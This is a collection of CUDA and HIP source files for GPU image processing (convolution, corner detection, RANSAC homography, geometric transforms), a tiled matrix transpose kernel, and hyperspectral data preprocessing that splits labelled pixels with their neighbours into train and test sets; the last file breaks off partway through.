else { // Create a copy of the data on device. cudaMalloc((unsigned char **)&dataCopy, _nBytes); cudaMemcpy(dataCopy, getData(), _nBytes, cudaMemcpyDeviceToDevice); // Copy kernel to device. float *d_kernel; cudaMalloc((float **)&d_kernel, kernelSide * kernelSide * sizeof(float)); cudaMemcpy(d_kernel, kernel, kernelSide * kernelSide * sizeof(float), cudaMemcpyHostToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); convolutionOnDevice<<<blocks, threads>>>(getData(), dataCopy, d_kernel, kernelSide, getWidth(), getHeight(), getChannels()); // Free memory. 
cudaFree(d_kernel); cudaFree(dataCopy); } } void Image::drawLine(int index1, int index2, int radius, int *color, int colorSize) { if (index1 < 0 or index2 < 0) { return; } int x1 = (int)(index1 / getWidth()); int y1 = (index1 % getWidth()); int x2 = (int)(index2 / getWidth()); int y2 = (index2 % getWidth()); this->drawLine(x1, y1, x2, y2, radius, color, colorSize); } void Image::drawLine(int x1, int y1, int x2, int y2, int radius, int *color, int colorSize) { if (strcmp(_device, _validDevices[0]) == 0) { drawLineOnHost(getData(), x1, y1, x2, y2, radius, color, colorSize, getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); size_t colorBytes = colorSize * sizeof(int); int *d_color; cudaMalloc((int **)&d_color, colorBytes); cudaMemcpy(d_color, color, colorBytes, cudaMemcpyHostToDevice); drawLineOnDevice<<<blocks, threads>>>(getData(), x1, y1, x2, y2, radius, d_color, colorSize, getWidth(), getHeight(), getChannels()); // Free memory. cudaFree(d_color); } } void Image::drawPoint(int index, int radius, int *color, int colorSize) { if (index < 0) { return; } int x = (int)(index / getWidth()); int y = (index % getWidth()); this->drawPoint(x, y, radius, color, colorSize); } void Image::drawPoint(int x, int y, int radius, int *color, int colorSize) { if (strcmp(_device, _validDevices[0]) == 0) { drawPointOnHost(getData(), x, y, radius, color, colorSize, getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); size_t colorBytes = colorSize * sizeof(int); int *d_color; cudaMalloc((int **)&d_color, colorBytes); cudaMemcpy(d_color, color, colorBytes, cudaMemcpyHostToDevice); drawPointOnDevice<<<blocks, threads>>>(getData(), x, y, radius, d_color, colorSize, getWidth(), getHeight(), getChannels()); // Free memory. cudaFree(d_color); } } void Image::findHomography(float *A, int *currentCorners, int *previousCorners, int maxCorners) { const int maxIter = 2000; const int N_POINTS = 3; const int SPACE_DIM = 2; int size = N_POINTS * (SPACE_DIM + 1) * maxIter; float *matrices = new float[size]; float *scores = new float[maxIter]; // Estimate maxIter different rigid transformations. // The algorithm estimates a matrix using a triplet of points. if (strcmp(_device, _validDevices[0]) == 0) { findHomographyRANSACOnHost(matrices, scores, maxIter, currentCorners, previousCorners, maxCorners, getWidth(), getHeight()); } else { // Instantiate matrices on device. size_t matricesBytes = size * sizeof(float); size_t scoresBytes = maxIter * sizeof(float); float *d_matrices, *d_scores; cudaMalloc((float **)&d_matrices, matricesBytes); cudaMalloc((float **)&d_scores, scoresBytes); // Copy corners on device. // Copy corner arrays to device. size_t cornersBytes = maxCorners * sizeof(int); int *d_currCorners, *d_prevCorners; cudaMalloc((int **)&d_currCorners, cornersBytes); cudaMalloc((int **)&d_prevCorners, cornersBytes); cudaMemcpy(d_currCorners, currentCorners, cornersBytes, cudaMemcpyHostToDevice); cudaMemcpy(d_prevCorners, previousCorners, cornersBytes, cudaMemcpyHostToDevice); // Generate a random list of indices. std::random_device rd; std::mt19937 gen(rd()); std::uniform_int_distribution<> uniform(0, maxCorners); int *randomIndices = new int[N_POINTS * maxIter]; for (int i = 0; i < N_POINTS * maxIter; i++) { randomIndices[i] = uniform(gen); } // Copy random indices to device. 
size_t randomIndicesBytes = N_POINTS * maxIter * sizeof(int); int *d_randomIndices; cudaMalloc((int **)&d_randomIndices, randomIndicesBytes); cudaMemcpy(d_randomIndices, randomIndices, randomIndicesBytes, cudaMemcpyHostToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((maxIter + threads.x - 1) / threads.x, 1); findHomographyRANSACOnDevice<<<blocks, threads>>>( d_matrices, d_scores, maxIter, d_currCorners, d_prevCorners, maxCorners, d_randomIndices, getWidth(), getHeight()); // Copy result to host. cudaMemcpy(matrices, d_matrices, matricesBytes, cudaMemcpyDeviceToHost); cudaMemcpy(scores, d_scores, scoresBytes, cudaMemcpyDeviceToHost); cudaFree(d_matrices); cudaFree(d_scores); cudaFree(d_currCorners); cudaFree(d_prevCorners); delete[] randomIndices; cudaFree(d_randomIndices); } // Retrieve the best matrix. int bestMatrix = -1; float minError = INFINITY; for (int i = 0; i < maxIter; i++) { if (scores[i] < minError) { int offset = i * (N_POINTS * (SPACE_DIM + 1)); // Avoid nan transformations. if (matrices[offset] == matrices[offset]) { bestMatrix = i; minError = scores[i]; } } } // Copy the best matrix element-wise. int offset = bestMatrix * (N_POINTS * (SPACE_DIM + 1)); for (int i = 0; i < N_POINTS * (SPACE_DIM + 1); i++) { if (minError < INFINITY) { A[i] = matrices[offset + i]; } else { // If the minError is INFINITY, then set the transformation to // the identity matrix to avoid any type of transformation. int side = sqrt(N_POINTS * (SPACE_DIM + 1)); A[i] = int(i % side == (int)i / side); } } delete[] matrices; delete[] scores; } void Image::goodFeaturesToTrack(int *corners, int maxCorners, float qualityLevel, float minDistance) { Image *gradX = new Image(getFilename(), true); Image *gradY = new Image(getFilename(), true); gradX->setDevice(getDevice()); gradY->setDevice(getDevice()); int side; float *sobelX, *sobelY; Kernel::SobelX(&sobelX, &side); Kernel::SobelY(&sobelY); gradX->convolution(sobelX, side); gradY->convolution(sobelY, side); int scoreSize = getWidth() * getHeight(); float *scoreMatrix = new float[scoreSize]; int *keys = new int[scoreSize]; float *values = new float[scoreSize]; if (strcmp(_device, _validDevices[0]) == 0) { cornerScoreOnHost(gradX->getData(), gradY->getData(), scoreMatrix, getWidth(), getHeight()); // Sort values. thrust::host_vector<int> h_keys(scoreSize, 0); thrust::sequence(h_keys.begin(), h_keys.end()); thrust::stable_sort_by_key(scoreMatrix, scoreMatrix + scoreSize, h_keys.begin(), thrust::greater<float>()); thrust::copy(h_keys.begin(), h_keys.end(), keys); thrust::copy(scoreMatrix, scoreMatrix + scoreSize, values); } else { // Copy corner array to device. size_t scoreMatrixBytes = scoreSize * sizeof(float); float *d_scoreMatrix; cudaMalloc((float **)&d_scoreMatrix, scoreMatrixBytes); // Determine grid size for parallel operations. int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((scoreSize + threads.x - 1) / threads.x, 1); cornerScoreOnDevice<<<blocks, threads>>>( gradX->getData(), gradY->getData(), d_scoreMatrix, getWidth(), getHeight()); // Sort values. 
thrust::device_ptr<float> d_values(d_scoreMatrix); thrust::device_vector<int> d_keys(scoreSize, 0); thrust::sequence(d_keys.begin(), d_keys.end()); thrust::stable_sort_by_key(d_values, d_values + scoreSize, d_keys.begin(), thrust::greater<float>()); thrust::copy(d_keys.begin(), d_keys.end(), keys); thrust::copy(d_values, d_values + scoreSize, values); } float threshold = values[0] * qualityLevel; int top = 0; for (int i = 0; i < maxCorners; ++i) { corners[i] = -1; float kValue; int kIndex; bool isDistant; do { kValue = values[top]; kIndex = keys[top]; isDistant = true; // Evaluate the Euclidean distance to the previous corners. int j = 0; while (j < i and isDistant) { int otherIndex = corners[j]; int dx = ((int)otherIndex / getWidth()) - ((int)kIndex / getWidth()); int dy = (otherIndex % getWidth()) - (kIndex % getWidth()); int dist = sqrt(pow(dx, 2) + pow(dy, 2)); isDistant = dist > minDistance; j++; } if (isDistant) { // Add only if score is high enough. if (kValue >= threshold) { corners[i] = kIndex; } } top++; } while (not isDistant); } // Free memory. delete gradX; delete gradY; delete[] sobelX; delete[] sobelY; delete[] scoreMatrix; delete[] keys; delete[] values; } void Image::rotate(double degree) { double rad = degree * (M_PI / 180); unsigned char *dataCopy; if (strcmp(_device, _validDevices[0]) == 0) { // Create a copy of the data on host. dataCopy = (unsigned char *)malloc(_nBytes); for (int i = 0; i < getSize(); i++) { dataCopy[i] = getData()[i]; } rotateOnHost(getData(), dataCopy, rad, getWidth(), getHeight(), getChannels()); // Free memory. free(dataCopy); } else { // Copy histogram to device. cudaMalloc((unsigned char **)&dataCopy, _nBytes); cudaMemcpy(dataCopy, _d_data, _nBytes, cudaMemcpyDeviceToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); rotateOnDevice<<<blocks, threads>>>( getData(), dataCopy, rad, getWidth(), getHeight(), getChannels()); // Free memory. cudaFree(dataCopy); } } void Image::scale(float ratio) { // Return if ratio is invalid. if (ratio == 1.0 or ratio < 0.0) { return; } unsigned char *newData; int newWidth = int(getWidth() * ratio); int newHeight = int(getHeight() * ratio); int newBytes = newWidth * newHeight * getChannels() * sizeof(unsigned char); if (strcmp(_device, _validDevices[0]) == 0) { newData = (unsigned char *)malloc(newBytes); scaleOnHost(newData, getData(), ratio, getWidth(), getHeight(), getChannels()); // Update data both on device and on host. free(_h_data); _h_data = newData; cudaFree(_d_data); cudaMalloc((unsigned char **)&_d_data, newBytes); cudaMemcpy(_d_data, _h_data, newBytes, cudaMemcpyHostToDevice); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((newWidth * newHeight + threads.x - 1) / threads.x, 1); cudaMalloc((unsigned char **)&newData, newBytes); scaleOnDevice<<<blocks, threads>>>( newData, getData(), ratio, getWidth(), getHeight(), getChannels()); // Update data both on device and on host. cudaFree(_d_data); cudaMalloc((unsigned char **)&_d_data, newBytes); cudaMemcpy(_d_data, newData, newBytes, cudaMemcpyDeviceToDevice); free(_h_data); _h_data = (unsigned char *)malloc(newBytes); cudaMemcpy(_h_data, _d_data, newBytes, cudaMemcpyDeviceToHost); // Free memory. cudaFree(newData); } // Update other attributes. _width = newWidth; _height = newHeight; _nBytes = newBytes; } void Image::translate(int px, int py) { unsigned char *dataCopy; if (strcmp(_device, _validDevices[0]) == 0) { // Create a copy of the data on host. 
dataCopy = (unsigned char *)malloc(_nBytes); for (int i = 0; i < getSize(); i++) { dataCopy[i] = getData()[i]; } translateOnHost(getData(), dataCopy, px, py, getWidth(), getHeight(), getChannels()); // Free memory. free(dataCopy); } else { // Copy histogram to device. cudaMalloc((unsigned char **)&dataCopy, _nBytes); cudaMemcpy(dataCopy, _d_data, _nBytes, cudaMemcpyDeviceToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); translateOnDevice<<<blocks, threads>>>(getData(), dataCopy, px, py, getWidth(), getHeight(), getChannels()); // Free memory. cudaFree(dataCopy); } } void Image::transpose() { // Return if width and height are different. if (getWidth() != getHeight()) { throw std::invalid_argument("width and height must have the same size"); } if (strcmp(_device, _validDevices[0]) == 0) { transposeOnHost(getData(), getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); transposeOnDevice<<<blocks, threads>>>(getData(), getWidth(), getHeight(), getChannels()); } }
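A minimal host-side sketch (not part of the original sources) of how the Image class above might be driven end to end. The file names, the "gpu" device string, and the corner counts are illustrative assumptions, not values taken from the project; error handling is omitted.

// Hypothetical driver for the Image class above. "frame1.png"/"frame2.png"
// and the "gpu" device string are assumptions about the surrounding project.
#include "../include/image.cuh"

int main() {
    Image prev("frame1.png", false);
    Image curr("frame2.png", false);

    // Run the following operations on the GPU copy of the data.
    prev.setDevice("gpu");
    curr.setDevice("gpu");

    // Detect up to 64 corners in the previous frame, then track them
    // into the current frame over a 3-level pyramid.
    const int maxCorners = 64;
    int corners[maxCorners];
    int tracked[maxCorners];
    prev.goodFeaturesToTrack(corners, maxCorners, 0.01f, 10.0f);
    curr.calcOpticalFlow(tracked, &prev, corners, maxCorners, 3);

    // Draw the tracked corners (drawPoint ignores indices of -1) and save.
    int green[3] = {0, 255, 0};
    for (int i = 0; i < maxCorners; i++) {
        curr.drawPoint(tracked[i], 2, green, 3);
    }
    curr.save("tracked.png");
    return 0;
}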
0c32ddc30bd58dfa21a8630c8480d226e4fba98b.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "../tools/checkerrors.h" #include <iostream> #define BLOCK_DIM 16 // Threadblock size for matrix transposition template <typename TYPE> __global__ void transposing(TYPE *odata, TYPE *idata, int width, int height) { __shared__ float block[BLOCK_DIM][BLOCK_DIM+1]; unsigned int xIndex = blockIdx.x * BLOCK_DIM + threadIdx.x; unsigned int yIndex = blockIdx.y * BLOCK_DIM + threadIdx.y; if((xIndex < width) && (yIndex < height)) { unsigned int index_in = yIndex * width + xIndex; block[threadIdx.y][threadIdx.x] = idata[index_in]; } __syncthreads(); xIndex = blockIdx.y * BLOCK_DIM + threadIdx.x; yIndex = blockIdx.x * BLOCK_DIM + threadIdx.y; if((xIndex < height) && (yIndex < width)) { unsigned int index_out = yIndex * height + xIndex; odata[index_out] = block[threadIdx.x][threadIdx.y]; } } // Wrapper function template <typename TYPE> void call_transposing (TYPE *odata, TYPE *idata, int width, int height) { checkCuda(hipFuncSetCacheConfig(transposing, hipFuncCachePreferShared)); dim3 blocks (ceil((float)width / BLOCK_DIM), ceil((float)height / BLOCK_DIM)); dim3 threads (BLOCK_DIM, BLOCK_DIM); hipLaunchKernelGGL(( transposing <TYPE>) , dim3(blocks),dim3(threads), 0, 0, odata , idata , width , height); checkCudaErrors(); }
0c32ddc30bd58dfa21a8630c8480d226e4fba98b.cu
#include "../tools/checkerrors.h" #include <iostream> #define BLOCK_DIM 16 // Threadblock size for matrix transposition template <typename TYPE> __global__ void transposing(TYPE *odata, TYPE *idata, int width, int height) { __shared__ float block[BLOCK_DIM][BLOCK_DIM+1]; unsigned int xIndex = blockIdx.x * BLOCK_DIM + threadIdx.x; unsigned int yIndex = blockIdx.y * BLOCK_DIM + threadIdx.y; if((xIndex < width) && (yIndex < height)) { unsigned int index_in = yIndex * width + xIndex; block[threadIdx.y][threadIdx.x] = idata[index_in]; } __syncthreads(); xIndex = blockIdx.y * BLOCK_DIM + threadIdx.x; yIndex = blockIdx.x * BLOCK_DIM + threadIdx.y; if((xIndex < height) && (yIndex < width)) { unsigned int index_out = yIndex * height + xIndex; odata[index_out] = block[threadIdx.x][threadIdx.y]; } } // Wrapper function template <typename TYPE> void call_transposing (TYPE *odata, TYPE *idata, int width, int height) { checkCuda(cudaFuncSetCacheConfig(transposing, cudaFuncCachePreferShared)); dim3 blocks (ceil((float)width / BLOCK_DIM), ceil((float)height / BLOCK_DIM)); dim3 threads (BLOCK_DIM, BLOCK_DIM); transposing <TYPE> <<<blocks,threads>>> (odata , idata , width , height); checkCudaErrors(); }
35a31397fcaf9cc86ea9e0d7cf3eceb4bad50cb9.hip
// !!! This is a file automatically generated by hipify!!! #include <mat.h> #include <stdio.h> #include <time.h> #include <sys/time.h> #include <math.h> #include <iostream> #include "rocblas.h" #include "cokus.cpp" #include "cuda_util.h" #include <hip/hip_runtime.h> using namespace std; const int NEU_NUM2 = 13; const int NEIGHBOR = 8;// //const int DATA_BATCH = 512;//512 //CUDA bool InitCUDA(){ int count; hipGetDeviceCount(&count); if(count==0){ fprintf(stderr,"There is no device.\n"); return false; } int i; for (i =0; i<count;i++){ hipDeviceProp_t prop; if(hipGetDeviceProperties(&prop,i)==hipSuccess){ if(prop.major>=1){ break; } } } if(i==count){ fprintf(stderr,"There is no device supporting CUDA 1.x.\n"); return false; } hipSetDevice(i); return true; } //copyshared memory __device__ void copy_data_to_shared(double * data, double * data_tmp, int length){ for(int i=0; i<length; i++){ data_tmp[i] = data[i]; } __syncthreads(); } // __global__ static void processing(int iter, double * data, int * train_index, double * processed_data, int x, int y, int z, int train_size) { int tid = blockIdx.x * blockDim.x + threadIdx.x; int threadNum = blockDim.x * gridDim.x; int id = tid + iter * threadNum; int idx = id * (NEIGHBOR+1) * z;//processed_data if (id < train_size){ for (int i=0; i<z; i++){ for (int j=0; j<(NEIGHBOR+1); j++){ processed_data[idx] = data[train_index[j + id*(NEIGHBOR+1)] + i * x*y]; idx = idx + 1; } } } } // int preprocess(double * data, double * labels, int x, int y, int z){ double * gpu_data;// double * gpu_processed_train;// double * gpu_processed_test; int * gpu_train_index;// int * gpu_test_index; // int data_size = 0; int * data_index = new int [x*y]; for(int i=0; i<x*y; i++){ if(labels[i] != 0){ data_index[data_size]=i; data_size ++; } } int test_size = (data_size-1)/5 + 1; int train_size = data_size - test_size; fprintf(stdout,"train_size:%d test_size:%d\n",train_size,test_size); int * train_index = new int [train_size * (NEIGHBOR + 1)];//9x*y int * test_index = new int [test_size * (NEIGHBOR+1)]; double * processed_labels = new double [train_size * NEU_NUM2]; double * test_labels = new double [test_size]; int tr=0, te=0; for (int i=0; i<data_size; i++){ if (i%5 != 0){ train_index[(NEIGHBOR/2) + tr * (NEIGHBOR+1)] = data_index[i];// train_index[(NEIGHBOR/2) + tr * (NEIGHBOR+1) - 1] = data_index[i] - 1; train_index[(NEIGHBOR/2) + tr * (NEIGHBOR+1) + 1] = data_index[i] + 1; for(int j0=0;j0<3;j0++){ train_index[j0 + tr * (NEIGHBOR+1)] = data_index[i] - 1 - x + j0; train_index[j0+6 + tr * (NEIGHBOR+1)] = data_index[i] - 1 + x + j0; } if((data_index[i] % x) == 0){// for (int j=0; j<3; j++) train_index[j*3 + tr*(NEIGHBOR+1)] = train_index[j*3+2 + tr*(NEIGHBOR+1)]; } if((data_index[i] % x) == (x-1)){// for(int j=0;j<3;j++) train_index[j*3+2 + tr*(NEIGHBOR+1)] = train_index[j*3 + tr*(NEIGHBOR+1)]; } if((data_index[i]/x) == 0){// for(int j=0;j<3;j++) train_index[j + tr*(NEIGHBOR+1)] = train_index[j+6 + tr*(NEIGHBOR+1)]; } if((data_index[i]/x) == (y-1)){// for(int j=0;j<3;j++) train_index[j+6 + tr*(NEIGHBOR+1)] = train_index[j + tr*(NEIGHBOR+1)]; } int mid = int(labels[data_index[i]])-1 + tr*NEU_NUM2; processed_labels[mid] = 1; tr = tr + 1; } else{ test_index[(NEIGHBOR/2) + te * (NEIGHBOR+1)] = data_index[i];// test_index[(NEIGHBOR/2) + te * (NEIGHBOR+1) - 1] = data_index[i] - 1; test_index[(NEIGHBOR/2) + te * (NEIGHBOR+1) + 1] = data_index[i] + 1; for(int j0=0;j0<3;j0++){ test_index[j0 + te * (NEIGHBOR+1)] = data_index[i] - 1 - x + j0; test_index[j0+6 + te * (NEIGHBOR+1)] = 
data_index[i] - 1 + x + j0; } if((data_index[i] % x) == 0){// for (int j=0; j<3; j++) test_index[j*3 + te*(NEIGHBOR+1)] = test_index[j*3+2 + te*(NEIGHBOR+1)]; } if((data_index[i] % x) == (x-1)){// for(int j=0;j<3;j++) test_index[j*3+2 + te*(NEIGHBOR+1)] = test_index[j*3 + te*(NEIGHBOR+1)]; } if((data_index[i]/x) == 0){// for(int j=0;j<3;j++) test_index[j + te*(NEIGHBOR+1)] = test_index[j+6 + te*(NEIGHBOR+1)]; } if((data_index[i]/x) == (y-1)){// for(int j=0;j<3;j++) test_index[j+6 + te*(NEIGHBOR+1)] = test_index[j + te*(NEIGHBOR+1)]; } //int mid = int(labels[data_index[i]])-1 + te*NEU_NUM2; test_labels[te] = labels[data_index[i]]; te = te + 1; } } fprintf(stdout,"train_size:%d\n",train_size); fprintf(stdout,"test_size:%d\n",test_size); //fprintf(stdout,"train_index[0]:%d %d %d %d,%d %d %d %d\n",train_index[0],train_index[1],train_index[2],train_index[3],train_index[5],train_index[6],train_index[7],train_index[8]); //fprintf(stdout,"train_index[10248]:%d %d %d %d,%d %d %d %d\n",train_index[9*10248],train_index[1+9*10248],train_index[2+9*10248],train_index[3+9*10248],train_index[5+9*10248],train_index[6+9*10248],train_index[7+9*10248],train_index[8+9*10248]); //int * train_index = new int [train_size * (NEIGHBOR + 1)];//train_size9 fprintf(stdout,"Index computing completed!\n"); // SAFE_CALL(hipMalloc((void **) &gpu_data, sizeof(double) * x * y * z)); SAFE_CALL(hipMemcpy(gpu_data, data, sizeof(double)* x * y * z, hipMemcpyHostToDevice)); SAFE_CALL(hipMalloc((void **) &gpu_train_index, sizeof(int) * train_size * (NEIGHBOR+1))); SAFE_CALL(hipMemcpy(gpu_train_index, train_index, sizeof(int) * train_size * (NEIGHBOR+1), hipMemcpyHostToDevice)); SAFE_CALL(hipMalloc((void **) &gpu_test_index, sizeof(int) * test_size * (NEIGHBOR+1))); SAFE_CALL(hipMemcpy(gpu_test_index, test_index, sizeof(int) * test_size * (NEIGHBOR+1), hipMemcpyHostToDevice)); SAFE_CALL(hipMalloc((void **) &gpu_processed_train, sizeof(double) * train_size * (NEIGHBOR+1) * z));// SAFE_CALL(hipMalloc((void **) &gpu_processed_test, sizeof(double) * test_size * (NEIGHBOR+1) * z)); int gridsize = 64; int blocksize = 1024; int threadnum = gridsize * blocksize; double * processed_train = new double [train_size * (NEIGHBOR+1) * z];\ double * processed_test = new double [test_size * (NEIGHBOR+1) *z]; // for (int iter=0; iter<=train_size/threadnum; iter++){ hipLaunchKernelGGL(( processing), dim3(gridsize),dim3(blocksize), 0, 0, iter, gpu_data, gpu_train_index, gpu_processed_train, x, y, z, train_size); hipLaunchKernelGGL(( processing), dim3(gridsize),dim3(blocksize), 0, 0, iter, gpu_data, gpu_test_index, gpu_processed_test, x, y, z, test_size); } hipDeviceSynchronize(); SAFE_CALL(hipMemcpy(processed_train, gpu_processed_train, sizeof(double) * train_size * (NEIGHBOR+1) * z, hipMemcpyDeviceToHost)); SAFE_CALL(hipMemcpy(processed_test, gpu_processed_test, sizeof(double) * test_size * (NEIGHBOR+1) * z, hipMemcpyDeviceToHost)); //hipDeviceSynchronize(); fprintf(stdout,"Processed train data:%lf %lf %lf %lf\n",processed_train[0],processed_train[1],processed_train[2],processed_train[3]); fprintf(stdout,"Processed test data:%lf %lf %lf %lf\n",processed_test[0],processed_test[1],processed_test[2],processed_test[3]); MATFile * pmatFile; pmatFile = matOpen("testdata.mat","w"); mxArray * m1 = mxCreateDoubleMatrix((NEIGHBOR+1)*z,test_size,mxREAL); memcpy((void *)mxGetPr(m1), (void *)processed_test, sizeof(double) * (NEIGHBOR+1) * z * test_size); matPutVariable(pmatFile, "data", m1); mxArray * m2 = mxCreateDoubleMatrix(test_size,1,mxREAL); memcpy((void 
*)mxGetPr(m2), (void *)test_labels, sizeof(double) * test_size); matPutVariable(pmatFile, "data", m2); matClose(pmatFile); MATFile * pmatFile0; pmatFile0 = matOpen("traindata.mat","w"); mxArray * m3 = mxCreateDoubleMatrix((NEIGHBOR+1)*z,train_size,mxREAL); memcpy((void *)mxGetPr(m3), (void *)processed_train, sizeof(double) * (NEIGHBOR+1) * z * train_size); matPutVariable(pmatFile0, "data", m3); mxArray * m4 = mxCreateDoubleMatrix(NEU_NUM2,train_size,mxREAL); memcpy((void *)mxGetPr(m4), (void *)processed_labels, sizeof(double) * train_size * NEU_NUM2); matPutVariable(pmatFile0, "labels", m4); matClose(pmatFile0); return 0; } // int main(int argc, char * argv[]) { if(!InitCUDA()){ return 0; } printf("CUDA initialized.\n"); clock_t start,end; double *trainset,*trainlabels; if(argc!=2){ fprintf(stderr, "4 input arguments required!"); } MATFile * datamat = matOpen(argv[1], "r"); mxArray * train = matGetVariable(datamat,"DataSet"); mxArray * labels = matGetVariable(datamat,"labels"); trainset = (double*)mxGetData(train); trainlabels = (double*)mxGetData(labels); fprintf(stdout,"Data reading completed!\n"); fprintf(stdout,"trainlabels:%lf %lf %lf %lf\n",trainlabels[87],trainlabels[88],trainlabels[89],trainlabels[90]); const mwSize * dim; dim = mxGetDimensions(train);//trainset fprintf(stdout,"Dimension:%d %d %d\n",dim[0],dim[1],dim[2]); start = clock(); int te = preprocess(trainset, trainlabels, dim[0], dim[1], dim[2]); end = clock(); double usetime = double(end - start); fprintf(stdout, "Using time of preprocessing:%lfs\n",usetime/CLOCKS_PER_SEC); return 0; }
35a31397fcaf9cc86ea9e0d7cf3eceb4bad50cb9.cu
#include <mat.h> #include <stdio.h> #include <time.h> #include <sys/time.h> #include <math.h> #include <iostream> #include "cublas_v2.h" #include "cokus.cpp" #include "cuda_util.h" #include <cuda_runtime.h> using namespace std; const int NEU_NUM2 = 13; const int NEIGHBOR = 8;//number of neighbours //const int DATA_BATCH = 512;//process the data for 512 pixels per batch //CUDA initialization bool InitCUDA(){ int count; cudaGetDeviceCount(&count); if(count==0){ fprintf(stderr,"There is no device.\n"); return false; } int i; for (i =0; i<count;i++){ cudaDeviceProp prop; if(cudaGetDeviceProperties(&prop,i)==cudaSuccess){ if(prop.major>=1){ break; } } } if(i==count){ fprintf(stderr,"There is no device supporting CUDA 1.x.\n"); return false; } cudaSetDevice(i); return true; } //copy data to shared memory __device__ void copy_data_to_shared(double * data, double * data_tmp, int length){ for(int i=0; i<length; i++){ data_tmp[i] = data[i]; } __syncthreads(); } //process the data on the GPU __global__ static void processing(int iter, double * data, int * train_index, double * processed_data, int x, int y, int z, int train_size) { int tid = blockIdx.x * blockDim.x + threadIdx.x; int threadNum = blockDim.x * gridDim.x; int id = tid + iter * threadNum; int idx = id * (NEIGHBOR+1) * z;//starting position in processed_data if (id < train_size){ for (int i=0; i<z; i++){ for (int j=0; j<(NEIGHBOR+1); j++){ processed_data[idx] = data[train_index[j + id*(NEIGHBOR+1)] + i * x*y]; idx = idx + 1; } } } } //data preprocessing int preprocess(double * data, double * labels, int x, int y, int z){ double * gpu_data;//raw data in device memory double * gpu_processed_train;//processed data in device memory double * gpu_processed_test; int * gpu_train_index;//indices of the training data int * gpu_test_index; //count the number of labeled pixels int data_size = 0; int * data_index = new int [x*y]; for(int i=0; i<x*y; i++){ if(labels[i] != 0){ data_index[data_size]=i; data_size ++; } } int test_size = (data_size-1)/5 + 1; int train_size = data_size - test_size; fprintf(stdout,"train_size:%d test_size:%d\n",train_size,test_size); int * train_index = new int [train_size * (NEIGHBOR + 1)];//9 rows, x*y columns; each column stores the indices of one pixel and its neighbours int * test_index = new int [test_size * (NEIGHBOR+1)]; double * processed_labels = new double [train_size * NEU_NUM2]; double * test_labels = new double [test_size]; int tr=0, te=0; for (int i=0; i<data_size; i++){ if (i%5 != 0){ train_index[(NEIGHBOR/2) + tr * (NEIGHBOR+1)] = data_index[i];//index of the current pixel train_index[(NEIGHBOR/2) + tr * (NEIGHBOR+1) - 1] = data_index[i] - 1; train_index[(NEIGHBOR/2) + tr * (NEIGHBOR+1) + 1] = data_index[i] + 1; for(int j0=0;j0<3;j0++){ train_index[j0 + tr * (NEIGHBOR+1)] = data_index[i] - 1 - x + j0; train_index[j0+6 + tr * (NEIGHBOR+1)] = data_index[i] - 1 + x + j0; } if((data_index[i] % x) == 0){//first row for (int j=0; j<3; j++) train_index[j*3 + tr*(NEIGHBOR+1)] = train_index[j*3+2 + tr*(NEIGHBOR+1)]; } if((data_index[i] % x) == (x-1)){//last row for(int j=0;j<3;j++) train_index[j*3+2 + tr*(NEIGHBOR+1)] = train_index[j*3 + tr*(NEIGHBOR+1)]; } if((data_index[i]/x) == 0){//first column for(int j=0;j<3;j++) train_index[j + tr*(NEIGHBOR+1)] = train_index[j+6 + tr*(NEIGHBOR+1)]; } if((data_index[i]/x) == (y-1)){//last column for(int j=0;j<3;j++) train_index[j+6 + tr*(NEIGHBOR+1)] = train_index[j + tr*(NEIGHBOR+1)]; } int mid = int(labels[data_index[i]])-1 + tr*NEU_NUM2; processed_labels[mid] = 1; tr = tr + 1; } else{ test_index[(NEIGHBOR/2) + te * (NEIGHBOR+1)] = data_index[i];//index of the current pixel test_index[(NEIGHBOR/2) + te * (NEIGHBOR+1) - 1] = data_index[i] - 1; test_index[(NEIGHBOR/2) + te * (NEIGHBOR+1) + 1] = data_index[i] + 1; for(int j0=0;j0<3;j0++){ test_index[j0 + te * (NEIGHBOR+1)] =
data_index[i] - 1 - x + j0; test_index[j0+6 + te * (NEIGHBOR+1)] = data_index[i] - 1 + x + j0; } if((data_index[i] % x) == 0){//first row for (int j=0; j<3; j++) test_index[j*3 + te*(NEIGHBOR+1)] = test_index[j*3+2 + te*(NEIGHBOR+1)]; } if((data_index[i] % x) == (x-1)){//last row for(int j=0;j<3;j++) test_index[j*3+2 + te*(NEIGHBOR+1)] = test_index[j*3 + te*(NEIGHBOR+1)]; } if((data_index[i]/x) == 0){//first column for(int j=0;j<3;j++) test_index[j + te*(NEIGHBOR+1)] = test_index[j+6 + te*(NEIGHBOR+1)]; } if((data_index[i]/x) == (y-1)){//last column for(int j=0;j<3;j++) test_index[j+6 + te*(NEIGHBOR+1)] = test_index[j + te*(NEIGHBOR+1)]; } //int mid = int(labels[data_index[i]])-1 + te*NEU_NUM2; test_labels[te] = labels[data_index[i]]; te = te + 1; } } fprintf(stdout,"train_size:%d\n",train_size); fprintf(stdout,"test_size:%d\n",test_size); //fprintf(stdout,"train_index[0]:%d %d %d %d,%d %d %d %d\n",train_index[0],train_index[1],train_index[2],train_index[3],train_index[5],train_index[6],train_index[7],train_index[8]); //fprintf(stdout,"train_index[10248]:%d %d %d %d,%d %d %d %d\n",train_index[9*10248],train_index[1+9*10248],train_index[2+9*10248],train_index[3+9*10248],train_index[5+9*10248],train_index[6+9*10248],train_index[7+9*10248],train_index[8+9*10248]); //int * train_index = new int [train_size * (NEIGHBOR + 1)];//train_size columns, 9 rows; each row stores the indices of one pixel and its neighbours fprintf(stdout,"Index computing completed!\n"); //allocate device memory and copy the data to the 